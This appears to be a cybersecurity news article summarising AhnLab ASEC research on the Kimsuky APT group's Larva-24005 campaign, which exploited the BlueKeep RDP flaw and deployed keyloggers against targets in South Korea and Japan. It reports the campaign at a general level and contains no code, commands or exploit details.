Kimsuky APT Exploits BlueKeep RDP Flaw in Cyber Attacks on South Korea and Japan

TL;DR

The North Korea-linked Kimsuky APT group has been exploiting the BlueKeep RDP vulnerability to gain initial access to systems in South Korea and Japan. This campaign, tracked as Larva-24005, involves the use of various malware and tactics to maintain remote access and exfiltrate data. The group has targeted multiple sectors, including software, energy, and finance, highlighting the ongoing cyber threat posed by North Korean actors.

Main Content

Researchers at the AhnLab Security Intelligence Center (ASEC) have uncovered a new campaign by the North Korea-linked Kimsuky APT group. This campaign, dubbed Larva-24005, exploits a patched Microsoft Remote Desktop Services (RDP) flaw to gain initial access to target systems.

Exploiting the BlueKeep Vulnerability

During their investigation, ASEC researchers discovered that the Kimsuky group exploited the BlueKeep vulnerability (CVE-2019-0708) to infiltrate target systems. Although an RDP vulnerability scanner was found in the compromised systems, there was no evidence of its actual use. The threat actors also employed other methods, such as attaching malicious files to emails and exploiting the Microsoft Office Equation Editor vulnerability (CVE-2017-11882) ¹.

Maintaining Remote Access

Once the attackers gained access, they modified the system configuration by installing the MySpy malware and RDPWrap to maintain remote access. In the final stage of the attack, they deployed keyloggers like KimaLogger or RandomQuery to record keystrokes. The group was observed sending phishing emails targeting South Korea and Japan from the compromised systems.

Targeted Sectors and Countries

Since September 2023, the Kimsuky APT group has targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and other countries. Their activities include phishing campaigns and attacks on South Korea’s software, energy, and financial sectors starting in October 2023. ASEC researchers have also published indicators of compromise (IoC) for this campaign.

Historical Context and Recent Activities

The Kimsuky cyberespionage group, also known as ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43, was first identified by Kaspersky researchers in 2013. Operating under the Reconnaissance General Bureau (RGB) foreign intelligence service, the group primarily targets think tanks and organizations in South Korea, with additional victims in the United States, Europe, and Russia.

In February, ASEC researchers observed the Kimsuky APT group conducting spear-phishing attacks to deliver the forceCopy info-stealer malware. The state-sponsored hackers sent spear-phishing messages to distribute malicious *.LNK shortcut files disguised as Office documents. When opened, these files executed PowerShell or Mshta to download malware like PebbleDash and RDP Wrapper, enabling the attackers to control the infected systems.

The group also uses a custom-built RDP Wrapper to enable remote desktop access, likely modifying export functions to evade detection. Additionally, they install proxy malware to achieve external access to infected systems located in private networks.

Keyloggers and Malware Deployment

The Kimsuky group employs keyloggers in various file formats, including PowerShell scripts. They also use the forceCopy stealer malware to capture keystrokes and extract files from browser directories.

Conclusion

The Kimsuky APT group’s exploitation of the BlueKeep RDP vulnerability underscores the ongoing cyber threat posed by North Korean actors. Their sophisticated tactics and tools highlight the need for robust cybersecurity measures to protect against such attacks. Organizations in targeted sectors should remain vigilant and implement comprehensive security strategies to mitigate these risks.

Additional Resources

For further insights, check:

• Kimsuky APT Group
• ASEC Report
• US-CERT Report on Kimsuky

References

1. ASEC (2025). “Report”. AhnLab Security Intelligence Center. ↩︎